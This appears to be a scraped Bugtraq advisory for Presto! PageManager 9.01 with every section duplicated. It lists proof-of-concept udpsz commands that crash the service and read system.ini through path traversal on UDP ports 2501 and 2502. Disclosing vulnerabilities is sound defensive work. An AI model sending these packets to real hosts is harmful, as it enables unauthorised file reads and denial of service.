Presto! PageManager Multiple Security Vulnerabilities
BID:52503
Info
Presto! PageManager Multiple Security Vulnerabilities
| Bugtraq ID: | 52503 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 15 2012 12:00AM |
| Updated: | Mar 19 2015 08:44AM |
| Credit: | Luigi Auriemma |
| Vulnerable: |
NewSoft Presto! PageManager 9.01 NewSoft Presto! PageManager 9 NewSoft Presto! PageManager 8 |
| Not Vulnerable: | |
Discussion
Presto! PageManager Multiple Security Vulnerabilities
Presto! PageManager is prone to multiple security vulnerabilities.
Remote attackers can exploit these issues to download arbitrary files, execute arbitrary code in the context of the application or cause denial-of-service conditions.
Presto! PageManager 9.01 is vulnerable; other versions may also be affected.
Presto! PageManager is prone to multiple security vulnerabilities.
Remote attackers can exploit these issues to download arbitrary files, execute arbitrary code in the context of the application or cause denial-of-service conditions.
Presto! PageManager 9.01 is vulnerable; other versions may also be affected.
Exploit / POC
Presto! PageManager Multiple Security Vulnerabilities
The following examples are available:
udpsz -T -C "00000100 ffff0200" 0 -b a -C "00 00 1000000000000000 00" -1 SERVER 2502 8+0x02ffff
udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00c:\\windows\\system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8
udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00../../../../windows/system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8
udpsz -T -C "00010000 ffffffff" SERVER 2501 -1
udpsz -T -C "00000100 ffffffff" SERVER 2502 -1
The following examples are available:
udpsz -T -C "00000100 ffff0200" 0 -b a -C "00 00 1000000000000000 00" -1 SERVER 2502 8+0x02ffff
udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00c:\\windows\\system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8
udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00../../../../windows/system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8
udpsz -T -C "00010000 ffffffff" SERVER 2501 -1
udpsz -T -C "00000100 ffffffff" SERVER 2502 -1
Solution / Fix
Presto! PageManager Multiple Security Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Presto! PageManager Multiple Security Vulnerabilities
References:
References:
- Presto! PageManager Homepage (NewSoft)
- Presto! PageManager Multiple Vulnerabilities (Luigi Auriemma)